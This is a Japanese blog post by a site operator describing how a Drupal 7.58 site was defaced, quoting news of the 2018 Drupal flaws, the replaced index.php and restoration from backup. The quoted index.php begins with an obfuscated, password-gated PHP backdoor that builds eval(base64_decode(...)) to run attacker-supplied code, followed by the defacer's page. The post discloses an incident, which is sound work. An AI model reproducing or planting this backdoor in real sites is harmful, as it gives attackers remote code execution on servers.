山崎 大祐 本日、運営中のサイトが乗っ取られてデータ書き換え被害にあいました。
写真を見ても大変気味が悪いです。
身近で起きたことですので、まさか自分が・・と驚きました。
置き換えられたファイルと復旧方法をお伝えいたします。
皆様も、早急なセキュリティアップデートを。
「Drupal」に「Drupalgeddon 2.0」とは別の脆弱性、更新が公開 – 早くも悪用を観測
コンテンツマネジメントシステム「Drupal」の開発チームは、深刻な脆弱性を修正するアップデートを公開した。すでに悪用が観測されているという。(2018/04/26)
Security NEXT
「Drupal」に乗っ取りが可能となる深刻な脆弱性、更新がリリース – 100万サイト以上に影響か
Security NEXT
書き換えられた状況
書き換えられた、index.phpの内容
Hacked By BALA SNIPER (BALA SNIPERがハッキングしましたよ)
balasniper17@gmail.com , fb:balasniper007 , contact me for fix !(修正のために私に連絡してください!)
書き換えられていたファイル
<?php if (isset($_POST['p'])&&md5($_POST['p'])==='2f54b4885e840cee404883dbbf08bbe8'){$st = 'return value';$cap='bas'.'e6'.'4_d'.'ec'.'ode';$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\'';if(isset($_POST['uf'])&&isset($_POST['pr'])){$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);array_walk($arr, strval($_POST['pr']), '');}} ?><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked By BALA SNIPER</title>
<meta name="keywords" content="BALA SNIPER">
<meta name="description" content="BALA SNIPER">
<link rel="shortcut icon" href="http://img04.arabsh.com/uploads/image/2014/02/21/0c31424864f406.gif" type="image/x-icon">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head><body background="http://i.imgur.com/5xLle3r.gif" bgcolor="#000000">
<style type="text/css">
<!--body,td,th {color: #CCCCCC;}
body {background="http://i.imgur.com/5xLle3r.gif"}
.style1 {font-family: Iceland;font-size: 10pt;}
.style2 {color: #00F000;font-weight: bold;}
.style3 {color: #FFFFFF}
.style7 {color: #FFFFFF; font-weight: bold; }
.style8 {font-family: Iceland;
font-size: 16pt;color: #FFFFFF;}
.style11 {font-size: 14pt}--></style></head>
<body bgcolor="#000000">
<center>
<pre><font color="red">
_ ___ _____________ _____ _____ _____ ___ _ _
| | / / | | | ___ \ _ \_ _/ ___|_ _/ _ \ | \ | |
| |/ /| | | | |_/ / | | | | | \ `--. | |/ /_\ \| \| |
| \| | | | /| | | | | | `--. \ | || _ || . ` |
| |\ \ |_| | |\ \| |/ / _| |_/\__/ / | || | | || |\ |
\_| \_/\___/\_| \_|___/ \___/\____/ \_/\_| |_/\_| \_/
</font></pre>
<font face="Iceland" size="3" color="#FFFFFF">
<p align="center"><font color="red" face="Iceland" size="7">Hacked By BALA SNIPER</font></p><p align="center">
</font></p><center><font face="Iceland" size="5" color="#FFFFFF"><img style="-webkit-user-select: none" src="http://www.webchinupload.com/f/2016-03/8cf33879f0d303411bb17e3e871bb333.jpg" width="490" height="359"><br>
<br><font color="red">balasniper17@gmail.com , fb:balasniper007 , contact me for fix !</font>
<iframe width="0" height="0" src="https://www.youtube.com/embed/Ox_rgDuyws8?start=177&autoplay=1&controls=0&loop=1&rel=0&showinfo=0&autohide=1&wmode=transparent&hd=1" frameborder="0" allowfullscreen=""></iframe>
</font>
</font>
</font>
</center>
</center>
</body>
</html>
復旧方法
運良く、改変前のサイト丸ごとバックアップを保存していたので助かりました。
すべてのファイルを削除して、ルートフォルダにファイルを設置。
データベースもすべて置き換えで復旧いたしました。
原因
多くのサイトを運営しているが今回被害にあったサイトのみDrupal Coreが7.58だったので原因だと考えられる。
他サイトのDrupal Core7.59は問題なく動いている。